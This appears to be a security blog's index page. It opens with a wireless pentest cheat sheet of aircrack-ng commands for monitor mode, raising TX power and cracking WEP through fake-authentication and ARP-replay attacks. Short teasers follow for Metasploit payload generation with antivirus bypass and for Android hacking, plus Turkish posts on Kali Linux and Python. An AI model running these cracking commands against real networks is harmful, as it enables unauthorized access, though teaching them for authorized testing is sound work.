Linux

Wireless Penetration Testing Cheat Sheet

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
# use wlan0 instead of wlan0mon
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

Driver Install

root@uceka:~# apt install realtek-rtl88xxau-dkms


WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »

Generating Payloads & Anti-Virus Bypass Methods

Posted on Updated on

Hi everyone… This article aboot is malicious stuff. How we can create payload? How we can connect & listen other’s pc… Yeap,they are all possible with Metasploit or other similar tools. Also; it’s safe for you. You don’t need to use any stealer,keylogger,crypter… Metasploit already has all of it 😉
Follow my steps…

My test machine is ; Windows 7 on the Virtual Machine & Windows 8
Local host ip : 10.34.0.62 (Backtrack 5 R3)
Local port : 4444

You can start with msfconsole or you can directly call meterpreter…
Read the rest of this entry »

Android Phone Hacking via XSSF & Using Content Provider File Exploit

Posted on Updated on

This article is about ; how we can hack android phones. We use;
XSSF  and android exploit (in the metasploit framework). Therefore we use Kali Linux.

My test phone is ; Virtual Device / Android 2.3.3 Emulator on Linux
My test computer is ; Virtual Machine (WMware_Mobisec 1.1)

Here we go;

Read the rest of this entry »

Backtrack 6 Çıktı!

Posted on Updated on

BackTrack Linux’un ilk versiyonu 7 yıl önce yayınlanmıştı… Günümüzde dünyada en yaygın kullanılan Linux dağıtımlarından birisi haline gelen BackTrack; pentest ve güvenlik alanında çalışmalar yapan kişiler için vazgeçilmez bir araç.
BackTrack’ın geliştiricileri yaklaşık olarak bir yıl kadar önce BackTrack 6 hakkında beyin fırtınası yapmaya başlamışlar. En sonunda Kali Linux adında çıkardıkları bu dağıtım, pek çok yenilik barındırmakta… Debian temelli bir dağıtım olan Kali Linux ile Backtrack arasında ne gibi farklar var derseniz eğer; geliştiriciler bu karşılaştırmayı yaparken “çok şey” ve “hiçbir şey” diye ifade ediyorlar. Aslında sizin BackTrack’ı hangi amaçlarda kullandığınız ile ilgili olarak aradaki farklar da değişiyor. Bu dağıtımın en büyük yeniliklerinden birisi de; cep telefonları, tablet ve bazı bilgisayar vb. kullanılan ARM işlemci destekleyen cihazlarda içinde  kullanılabilmesi.
Tamamen ücretsiz olan bu dağıtım 300’den fazla pentest aracı içermekte.Örnek ekran görüntüleri;
Read the rest of this entry »

Python Programlama – 2

Posted on Updated on

Python programlama yazı serisinin ikinci kısmını içerecek bu yazıda; örneklerle döngüler, fonksiyonlar ve nesne-sınıf yaplarını anlatmaya çalışacağım. Bu yazı serisinin ilk kısmına buradan erişebilirsiniz.

Döngüler

‘While’ Döngüsü

Bilindiği üzere “while” komutu algoritmik notasyonlarda ‘.. olduğu sürece’ anlamına gelmektedir. Örneğin ;
Read the rest of this entry »